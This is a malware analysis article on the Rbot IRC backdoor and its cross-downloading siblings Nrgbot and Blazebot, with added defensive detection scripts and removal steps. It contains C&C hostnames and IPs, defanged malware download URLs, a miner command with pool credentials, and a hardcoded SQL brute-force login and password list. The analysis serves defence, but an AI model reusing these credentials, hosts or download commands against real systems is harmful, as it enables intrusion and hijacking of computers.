Rbot

by Alexander Saprykin on July 17th, 2013 in Malware Descriptions.

Platform: Win32
Type: Backdoor
Size: 340974 bytes
Packer: unknown
Unpacked size: 639 KB
Language: C++
MD5: df2436b584808064ddf4788b04f215f3
SHA1: 69c65c7e75d275fd8d0783d84d50cd7d6933d335
Aliases: Trojan.Win32.Ircbrute, Backdoor:Win32/Rbot, Backdoor.Win32.DarkKomet

Summary

Rbot is a Trojan program which gives an attacker remote access to the compromised system. The sample analysed here is distributed as "rundat.exe", which another malicious program, Blazebot, downloads from the FTP server:

jayne.p0rn-lover.us:8989

The file's compilation date is 30.06.2013.

During the investigation, "rundat.exe" was downloaded several times; the copies had the following MD5 hashes:

7d6a4a7924bccc6537fc643e2f956c36, detected as Trojan.Win32.Ircbrute by Ad-Aware Antivirus; compilation date 19.06.2013.

c7c7345bb0c0e14a9b6b937fc7ebb2fd, detected as Trojan.Win32.Generic!BT; compilation date 07.07.2013.

cb46ce95ad089c540b4e02daeb192e6f, detected as Trojan.Win32.Ircbrute; compilation date 04.07.2013.

The most recent revision of "rundat.exe" received from the FTP server has MD5 ef484d123cecaa3744774187dd120164 and a compilation date of 15.07.2013; at the time of writing almost no antivirus products detected it.

All of these files have identical functionality. To evade antivirus detection, the attackers run the executable through a mutation engine and periodically upload a fresh build of the backdoor to the server.

Technical Details

Installation

Once activated, the backdoor copies itself to the system folder under a randomly generated name:

%System%\<rnd>.exe

The copy's file timestamps are set to match those of "explorer.exe", so that it does not stand out as a recently created file.

The "Read-only" and "Hidden" attributes are then set on the file.

To be launched automatically on each Windows startup, the backdoor adds a reference to its executable under the following registry keys:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"Supports RAS Connections" = "%System%\<rnd>.exe"

[HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Supports RAS Connections" = "<rnd>.exe"

[HKLM\SYSTEM\CurrentControlSet\Control\Lsa]
"Supports RAS Connections" = "<rnd>.exe"

[HKLM\Software\Microsoft\yOLE]
"Supports RAS Connections" = "<rnd>.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Supports RAS Connections" = "%System%\<rnd>.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Supports RAS Connections" = "<rnd>.exe"

[HKCU\SYSTEM\CurrentControlSet\Control\Lsa]
"Supports RAS Connections" = "<rnd>.exe"

[HKCU\Software\Microsoft\yOLE]
"Supports RAS Connections" = "<rnd>.exe"

where <rnd> is a random sequence of Latin alphabet letters (for example, "bjxfdcz" or "jqoglul"). Note that only the Run and RunServices keys are genuine autostart locations; the Lsa and yOLE entries are written alongside them and serve as a stable marker of this family.
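
One way to hunt for these autorun entries offline, as an added example that is not part of the original article: the script below parses a .reg export (the text format that `reg export` and regedit write) and flags the value name "Supports RAS Connections" under any key, anything under the non-standard Software\Microsoft\yOLE key, and Run entries that launch a batch file (which also catches the miner's "Windows Update" entry described in the Nrgbot section). The export embedded in the script is constructed; the key paths and the value name are the article's, the VMware and OneDrive entries are benign filler.

```python
"""Offline check of a Windows registry export for the persistence entries described
above. Added example, not code from the original article. It parses the text
format written by `reg export` / regedit (.reg files), so it can be run against an
export taken from a suspect host or from a mounted disk image. The export below is
constructed; the key paths and the value name "Supports RAS Connections" come from
the article, the VMware/OneDrive entries are benign filler."""
from __future__ import annotations

import re

VALUE_NAME = "Supports RAS Connections"

# Keys the backdoor writes (from the article), in the long hive spelling reg.exe uses
RBOT_KEYS = {
    f"{hive}\\{sub}".lower()
    for hive in ("HKEY_LOCAL_MACHINE", "HKEY_CURRENT_USER")
    for sub in (
        r"Software\Microsoft\Windows\CurrentVersion\Run",
        r"Software\Microsoft\Windows\CurrentVersion\RunServices",
        r"SYSTEM\CurrentControlSet\Control\Lsa",
        r"Software\Microsoft\yOLE",
    )
}
RUN_KEY_RE = re.compile(r"\\Windows\\CurrentVersion\\Run(Services|Once)?$", re.IGNORECASE)
REG_VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def _unescape(s: str) -> str:
    # .reg files escape backslash and double quote inside quoted strings
    return re.sub(r'\\(["\\])', r"\1", s)


def parse_reg_export(text: str) -> dict[str, dict[str, str]]:
    """Return {key_path: {value_name: data}}. REG_SZ data is unquoted and unescaped;
    other types (dword:, hex:...) are kept as their raw text."""
    keys: dict[str, dict[str, str]] = {}
    current: str | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = REG_VALUE_RE.match(line)
        if current is None or m is None:
            continue  # continuation lines of hex: values are not needed here
        name = "@" if m.group(1) is None else _unescape(m.group(1))
        data = m.group(2)
        if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            data = _unescape(data[1:-1])
        keys[current][name] = data
    return keys


def find_persistence(text: str) -> list[dict]:
    """Flag the article's indicators: the RAS value name under any key, anything under
    the bogus yOLE key, and Run entries that launch a .bat (the miner's "Windows Update")."""
    findings = []
    for key, values in parse_reg_export(text).items():
        for name, data in values.items():
            reasons = []
            if name == VALUE_NAME:
                reasons.append("Rbot autorun value name")
            if key.lower().endswith(r"\software\microsoft\yole"):
                reasons.append("value under non-standard yOLE key")
            if RUN_KEY_RE.search(key) and data.lower().endswith(".bat"):
                reasons.append("Run entry launching a batch file")
            if reasons:
                findings.append({"key": key, "name": name, "data": data,
                                 "known_rbot_key": key.lower() in RBOT_KEYS,
                                 "reasons": reasons})
    return findings


def load_reg_file(path: str) -> str:
    # reg.exe and regedit write .reg files as UTF-16 LE with a BOM; hand-written
    # ones may be plain text, so fall back to UTF-8
    try:
        with open(path, encoding="utf-16") as fh:
            return fh.read()
    except UnicodeError:
        with open(path, encoding="utf-8-sig") as fh:
            return fh.read()


# Constructed export, not taken from a real host
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VMware User Process"="\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" -n vmusr"
"Supports RAS Connections"="C:\\Windows\\system32\\bjxfdcz.exe"
"Windows Update"="C:\\Windows\\system\\critical\\antivirus.bat"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"LmCompatibilityLevel"=dword:00000003
"Supports RAS Connections"="bjxfdcz.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\yOLE]
"Supports RAS Connections"="bjxfdcz.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
'''

if __name__ == "__main__":
    for f in find_persistence(SAMPLE_EXPORT):
        print(f"[{', '.join(f['reasons'])}] {f['key']} :: {f['name']} = {f['data']}")
```

Export the relevant hives on the suspect host with, for example, `reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Run run.reg` and pass the text to find_persistence(load_reg_file("run.reg")). Matching on the value name rather than on the executable name is deliberate: the file name is random per infection, the value name is not.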

Payload

To ensure that only one instance of the backdoor runs at a time, the Trojan creates a uniquely named synchronization object (mutex):

LIQUID

The backdoor connects to the IRC server:

videos.p0rn-lover.us:6667

Once connected, the backdoor registers with a specially constructed NICK that depends on the locale of the compromised system, on random digits derived from the time elapsed since system startup, and on whether a window of the "mIRC" class exists on the system (that is, whether the mIRC client is running).

Once successfully connected to the C&C server, the backdoor joins the following channel to receive commands:

#fkyou#

The server is located in the United States.

At the time of writing, the backdoor was receiving commands to download another malicious program.

The file is downloaded from the following URL:

hxxp://www.dropbox.com/s/eysw6hxovddeau5/nn.exe?dl=1

The file is 262736 bytes in size, MD5 04d32029a7e277222a5c48c432b23b26. It is the malicious program known as NrgBot, detected by Ad-Aware Antivirus as Worm.Win32.Dorkbot; compilation date 04.07.2013.

The downloaded file is then saved to the root Windows folder under the name "system.exe":

%WinDir%\system.exe

Once successfully downloaded, the file is launched for execution.
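
The IRC exchange described above, as an added example that is not code from the article or from the bot: parse_line() implements the RFC 1459 message grammar, handshake() and keepalive_reply() show what a client must send to register, join the channel and stay connected, and extract_commands() pulls the operator's commands out of a captured session. It also treats the channel topic (numeric 332 on join, TOPIC on change) as a command source, which is how IRC bots of this kind are commonly driven. The session is constructed: only the server name, the channel names and the Dropbox URLs come from the article; the nick format "USA|1234567" and the ".download <url> <path> <run>" command syntax are assumptions.

```python
"""Passive monitor for the IRC command channel described above. Added example,
not code from the article or the malware. The session below is constructed:
only the server name, the channel names and the Dropbox URLs come from the
article. The nick format "USA|1234567" and the ".download <url> <path> <run>"
command syntax are assumptions about how this bot family is driven."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# RFC 1459 line: [":" prefix SPACE] command {SPACE middle} [SPACE ":" trailing]
IRC_LINE = re.compile(
    r"^(?::(?P<prefix>\S+) )?(?P<command>\S+)"
    r"(?P<params>(?: (?!:)\S+)*)(?: :(?P<trailing>.*))?$"
)
URL_RE = re.compile(r"\b(?:hxxps?|https?|ftp)://\S+", re.IGNORECASE)


@dataclass
class Message:
    prefix: Optional[str]
    command: str
    params: list[str]

    @property
    def sender(self) -> Optional[str]:
        # "nick!user@host" -> nick; a bare server name is returned unchanged
        return self.prefix.split("!", 1)[0] if self.prefix else None


def parse_line(line: str) -> Message:
    m = IRC_LINE.match(line.rstrip("\r\n"))
    if m is None:
        raise ValueError(f"malformed IRC line: {line!r}")
    params = m.group("params").split()
    if m.group("trailing") is not None:
        params.append(m.group("trailing"))
    return Message(m.group("prefix"), m.group("command").upper(), params)


def handshake(nick: str, channel: str) -> list[str]:
    """What a client sends to register and join its command channel."""
    return [f"NICK {nick}", f"USER {nick} 0 * :{nick}", f"JOIN {channel}"]


def keepalive_reply(msg: Message) -> Optional[str]:
    """Servers drop clients that do not answer PING; the bot (and a monitor) must reply."""
    if msg.command == "PING" and msg.params:
        return f"PONG :{msg.params[-1]}"
    return None


def _channel_and_text(msg: Message) -> Optional[tuple[str, str, str]]:
    # Commands reach the bot either as channel messages or as the channel topic,
    # which the server hands over on join (numeric 332) or on change (TOPIC).
    if msg.command in ("PRIVMSG", "TOPIC") and len(msg.params) >= 2:
        return msg.params[0], msg.params[-1], "message" if msg.command == "PRIVMSG" else "topic"
    if msg.command == "332" and len(msg.params) >= 3:
        return msg.params[1], msg.params[-1], "topic"
    return None


def extract_commands(session: str, channels: set[str]) -> list[dict]:
    """Every command delivered to a watched channel, with any URLs it carries."""
    watched = {c.lower() for c in channels}
    found = []
    for raw in session.splitlines():
        if not raw.strip():
            continue
        hit = _channel_and_text(msg := parse_line(raw))
        if hit and hit[0].lower() in watched:
            channel, text, via = hit
            found.append({"channel": channel, "via": via, "from": msg.sender,
                          "text": text, "urls": URL_RE.findall(text)})
    return found


# Constructed session (server -> client direction), not a real capture
SAMPLE_SESSION = """\
:videos.p0rn-lover.us 001 USA|1234567 :Welcome to the network
PING :videos.p0rn-lover.us
:USA|1234567!bot@10.0.0.5 JOIN :#fkyou#
:videos.p0rn-lover.us 332 USA|1234567 #fkyou# :.download hxxp://www.dropbox.com/s/eysw6hxovddeau5/nn.exe?dl=1 %WinDir%\\system.exe 1
:op!op@hidden PRIVMSG #fkyou# :.download hxxp://www.dropbox.com/s/a4gaze3j44i5b19/n.exe?dl=1 %WinDir%\\system.exe 1
:op!op@hidden PRIVMSG #nrz# :.download hxxp://www.dropbox.com/s/z2bevmalyco39ap/rep.exe?dl=1 %AppData%\\3f9a.exe 1
:op!op@hidden PRIVMSG USA|1234567 :hello
:op!op@hidden PRIVMSG #Security-Check :idle
"""

if __name__ == "__main__":
    for cmd in extract_commands(SAMPLE_SESSION, {"#fkyou#", "#nrz#"}):
        print(f"{cmd['channel']} ({cmd['via']}, from {cmd['from']}): {cmd['text']}")
```

Feeding a live socket's lines to parse_line() and answering every PING with keepalive_reply() is all that is needed to watch a channel the way the author did with mIRC; run such a monitor from an isolated host, because the operator can see who joins.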

During the investigation the C&C server also sent commands to download NrgBot from the following URLs:

hxxp://www.dropbox.com/s/a4gaze3j44i5b19/n.exe?dl=1
hxxp://www.dropbox.com/s/3oqkk0kmn11qo52/n.exe?dl=1

The file is 243488 bytes in size, MD5 e9de715aebb1724efb666b68682e17b2, and is detected by Ad-Aware Antivirus as Worm.Win32.Dorkbot; compilation date 04.07.2013.

hxxps://www.dropbox.com/s/7j355a8pnz8fbcm/nr.exe?dl=1

The file is 263760 bytes in size, MD5 9cef91d3c589d3221ba4a382cdd8eefa, and is detected by Ad-Aware Antivirus as Worm.Win32.Dorkbot; compilation date 09.07.2013.

Use of the mutation engine lets the attackers evade antivirus detection effectively.

On the attacker's commands, the backdoor can perform the following actions:

  • Start a remote shell and run commands.
  • Send a SYN flood to a target system: a denial-of-service attack in which a succession of TCP SYN requests is sent to the target to consume enough server resources to make it unresponsive to legitimate traffic.
  • Send an ACK flood to a target system: a denial-of-service attack that sends a large number of TCP packets with the ACK flag set to the target.
  • Download other malicious programs.
  • Redirect TCP traffic.
  • Upload files through FTP.
  • Terminate threads.
  • Launch a TFTP server.
  • Perform a DNS look-up.
  • Send clipboard data.
  • Visit URLs specified by the attacker.
  • Delete files specified by the attacker.
  • Scan for open ports on the network.
  • Send e-mail.
  • Send network configuration information.
  • Send the thread list.
  • Execute commands through the mIRC Internet Relay Chat client, if it is installed on the compromised system.
  • Delete its own executable using a batch file for the command interpreter, saved in the current user's Windows temporary folder under the name:

%Temp%\<rnd1>sdel.bat

where <rnd1> is a random sequence of Latin alphabet letters.

  • The backdoor also listens on TCP port 113, the Ident service that some IRC servers query when a client connects.

The backdoor may also attempt to spread to SQL servers by logging in with commonly used credentials. Once connected, it may instruct the server to download and run a copy of the bot via TFTP, served from the bot's own TFTP server.

Below is the list of logins and passwords hardcoded in the malware for this purpose.

Logins:

administrator
administrador
administrateur
administrat
admins
admin
staff
root
computer
owner
student
teacher
wwwadmin
guest
default
database
dba
oracle
db2

Passwords:

administrator
administrador
administrateur
administrat
admins
admin
adm
password1
password
passwd
pass1234
pass
pwd
007
1
12
123
1234
12345
123456
1234567
12345678
123456789
1234567890
2000
2001
2002
2003
2004
test
guest
none
demo
unix
linux
changeme
default
system
server
root
null
qwerty
mail
outlook
web
www
internet
accounts
accounting
home
homeuser
user
oem
oemuser
oeminstall
windows
win98
win2k
winxp
winnt
win2000
qaz
asd
zxc
qwe
bob
jen
joe
fred
bill
mike
john
peter
luke
sam
sue
susan
peter
brian
lee
neil
ian
chris
eric
george
kate
bob
katie
mary
login
loginpass
technical
backup
exchange
fuck
bitch
slut
sex
god
hell
hello
domain
domainpass
domainpassword
database
access
dbpass
dbpassword
databasepass
data
databasepassword
db1
db2
db1234
sa
sql
sqlpassoainstall
orainstall
oracle
ibm
cisco
dell
compaq
siemens
hp
nokia
xp
control
office
blank
winpass
main
lan
internet
intranet
student
teacher
staff
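
The credential-spraying behaviour above, seen from the SQL server's side, as an added example that is not code from the article: the script parses SQL Server ERRORLOG-style "Login failed for user" lines, keeps a sliding window of failures per source address, and raises one alert per source whose burst spreads over several distinct logins, reporting how many of those logins belong to the bot's hardcoded list. The log lines are constructed in the layout SQL Server writes and are not from a real server; the thresholds are assumptions to be tuned to the server's normal failure rate.

```python
"""Detection logic for the SQL-server credential spraying described above, run over
SQL Server ERRORLOG-style "Login failed" lines. Added example, not code from the
article. The log lines are constructed (in the layout SQL Server writes, but not
from a real server); the login list is the article's. Thresholds are assumptions."""
from __future__ import annotations

import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Logins hardcoded in the bot (from the article)
RBOT_LOGINS = {
    "administrator", "administrador", "administrateur", "administrat", "admins",
    "admin", "staff", "root", "computer", "owner", "student", "teacher",
    "wwwadmin", "guest", "default", "database", "dba", "oracle", "db2",
}

LOGIN_FAILED_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failures(lines):
    """Yield (timestamp, client_ip, login) for each failed-login line; skip the rest."""
    for line in lines:
        m = LOGIN_FAILED_RE.search(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), m["client"], m["user"].lower()


def detect_spraying(lines, window=timedelta(seconds=60), min_attempts=10, min_users=3):
    """One alert per source IP that, within any `window`, produced at least
    `min_attempts` failures spread over at least `min_users` distinct logins.
    A sliding window per source keeps memory bounded on a long log."""
    recent: dict[str, deque] = defaultdict(deque)  # client -> (ts, user) inside window
    alerts: dict[str, dict] = {}
    for ts, client, user in parse_failures(lines):
        q = recent[client]
        q.append((ts, user))
        while q and ts - q[0][0] > window:
            q.popleft()
        users = {u for _, u in q}
        if len(q) >= min_attempts and len(users) >= min_users:
            a = alerts.setdefault(client, {"first_seen": q[0][0], "attempts": 0, "users": set()})
            a["attempts"] = max(a["attempts"], len(q))
            a["users"] |= users
    return {
        client: {
            "first_seen": a["first_seen"],
            "attempts": a["attempts"],
            "users": sorted(a["users"]),
            # overlap with the bot's list is what ties a burst to this family
            "rbot_overlap": sorted(a["users"] & RBOT_LOGINS),
        }
        for client, a in alerts.items()
    }


def _errorlog_line(ts: datetime, user: str, client: str) -> str:
    # Constructed in the layout of a SQL Server ERRORLOG entry
    return (f"{ts:%Y-%m-%d %H:%M:%S}.45 Logon       Login failed for user '{user}'. "
            f"Reason: Password did not match that for the login provided. [CLIENT: {client}]")


_BASE = datetime(2013, 7, 15, 10, 0, 0)
SPRAY_USERS = ["administrator", "admin", "root", "dba", "oracle", "guest",
               "db2", "database", "default", "owner", "staff", "admins"]
# 12 failures in 22 seconds from one host using the bot's logins, plus a service
# account that fails once every five minutes (a misconfigured job, not an attack)
SAMPLE_LOG = sorted(
    [_errorlog_line(_BASE + timedelta(seconds=2 * i), u, "10.0.0.5")
     for i, u in enumerate(SPRAY_USERS)]
    + [_errorlog_line(_BASE + timedelta(minutes=m), "reportsvc", "10.0.0.9") for m in (1, 6, 11)]
    + ["2013-07-15 10:00:30.10 spid12s     SQL Server is now ready for client connections."]
)

if __name__ == "__main__":
    for client, alert in detect_spraying(SAMPLE_LOG).items():
        print(f"{client}: {alert['attempts']} failures from {alert['first_seen']}, "
              f"{len(alert['rbot_overlap'])}/{len(alert['users'])} logins match the Rbot list")
```

Failed logins only reach the ERRORLOG when login auditing includes failures (the default), so check that setting first. A hit here should be followed by looking for outbound TFTP (UDP port 69) from the SQL host, since that is the delivery channel described above.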

Nrgbot

Nrgbot, downloaded by the backdoor, is saved as "%WinDir%\system.exe" and, once launched, connects to the same IRC server (videos.p0rn-lover.us:6667).

It then joins the following channel:

#nrz#

and receives commands to download files to the compromised computer.

Files are downloaded from the following URLs:

hxxp://www.dropbox.com/s/z2bevmalyco39ap/rep.exe?dl=1

The file is 234576 bytes in size, MD5 b027d16320803018b0602c1d32a09570, detected by Ad-Aware Antivirus as Trojan.Win32.Generic!BT; compilation date 07.07.2013. It is the Blazebot malware.

hxxp://www.dropbox.com/s/6etxnj97npjpyq8/van.exe?dl=1

The file is 661869 bytes in size, MD5 02d0587c38f896e07a5cd351c04dbcb, detected by Ad-Aware Antivirus as Trojan.Win32.Generic!BT; compilation date 09.06.2012. The program is a bitcoin miner.

The files are saved under a randomly generated name to:

%AppData%\<rnd2>.exe

where <rnd2> is a random string of hexadecimal digits.

The bitcoin-mining module is installed into the following hidden folder:

%WinDir%\system\critical\btc.il (151652 bytes)
%WinDir%\system\critical\phatk.ptx (206858 bytes)
%WinDir%\system\critical\phatk.cl (9741 bytes)
%WinDir%\system\critical\system.exe (54784 bytes)
%WinDir%\system\critical\usft_ext.dll (939264 bytes)
%WinDir%\system\critical\btc-evergreen.il (84967 bytes)
%WinDir%\system\critical\antivirus.bat (79 bytes)
%WinDir%\system\critical\miner.dll (340992 bytes)
%WinDir%\system\critical\guicomp.dll (33792 bytes)
%WinDir%\system\critical\sys.bat (345 bytes)
%WinDir%\system\critical\nircmd.exe (43520 bytes)
%WinDir%\system\critical\coinutil.dll (29184 bytes)

The miner is launched with the command:

system.exe -o hxxp://hitmanuk_pran:123@coin.odin-valhall.com:8332 -g yes -I 100

where the -o argument names the mining pool (coin.odin-valhall.com, port 8332) together with the worker credentials embedded in the URL (user hitmanuk_pran, password 123). Mining causes CPU usage to increase.

To launch the bitcoin miner automatically, the following registry value is created:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Windows Update" = "C:\Windows\system\critical\antivirus.bat"

A description of Rbot generated by our automated malware analysis system can be found here.

Conclusion

Three IRC bots, Rbot, Nrgbot and Blazebot, are apparently under the control of the same operator. On the attacker's commands, Rbot downloads Nrgbot; Nrgbot in turn downloads Blazebot; and Blazebot downloads Rbot. Each bot thus downloads another bot controlled by the same attacker, and the three help each other keep the system persistently infected. The attackers use a mutation engine to generate new builds of each program, which makes it harder to remove all three IRC bots from a compromised system at once.

Two C&C servers have been identified from which commands are received by Nrgbot (channel #nrz#), Rbot (channel #fkyou#) and Blazebot (channel ##TBT), plus an auto-join channel "#Security-Check" shared by all of the bots:

178.33.232.15
146.82.5.222

By connecting to the C&C servers with the mIRC Internet Relay Chat client, it is possible to watch the commands the bots currently receive. At the time of writing, both servers were issuing the same commands.

At the time of writing, a link to download the bitcoin-mining module was being distributed in the "#Security-Check" channel.

Figure: scheme of how the three bots interact.


Removal Recommendations

  1. Follow the recommendations for removing Nrgbot and Blazebot without restarting the PC.
  2. Delete the following registry values ("How to Work with System Registry"):

    [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
    "Supports RAS Connections" = "%System%\<rnd>.exe"

    [HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices]
    "Supports RAS Connections" = "<rnd>.exe"

    [HKLM\SYSTEM\CurrentControlSet\Control\Lsa]
    "Supports RAS Connections" = "<rnd>.exe"

    [HKLM\Software\Microsoft\yOLE]
    "Supports RAS Connections" = "<rnd>.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Supports RAS Connections" = "%System%\<rnd>.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices]
    "Supports RAS Connections" = "<rnd>.exe"

    [HKCU\SYSTEM\CurrentControlSet\Control\Lsa]
    "Supports RAS Connections" = "<rnd>.exe"

    [HKCU\Software\Microsoft\yOLE]
    "Supports RAS Connections" = "<rnd>.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Windows Update" = "C:\Windows\system\critical\antivirus.bat"

  3. Reboot the computer.
  4. Delete the following files (the Rbot copy has the Hidden and Read-only attributes set, so clear them first with "attrib -r -h" or enable showing hidden files):

    %System%\<rnd>.exe
    %WinDir%\system.exe
    %AppData%\<rnd2>.exe
    %WinDir%\system\critical\btc.il
    %WinDir%\system\critical\phatk.ptx
    %WinDir%\system\critical\phatk.cl
    %WinDir%\system\critical\system.exe
    %WinDir%\system\critical\usft_ext.dll
    %WinDir%\system\critical\btc-evergreen.il
    %WinDir%\system\critical\antivirus.bat
    %WinDir%\system\critical\miner.dll
    %WinDir%\system\critical\guicomp.dll
    %WinDir%\system\critical\sys.bat
    %WinDir%\system\critical\nircmd.exe
    %WinDir%\system\critical\coinutil.dll

  5. Delete the original malware file (its name and location depend on how the Trojan originally reached the computer).
  6. Clean the Temporary Internet Files folder, which may contain infected files ("How to clean Temporary Internet Files folder").
  7. Run a full scan of the computer with an antivirus program using an up-to-date definition database ("Download Ad-Aware Free").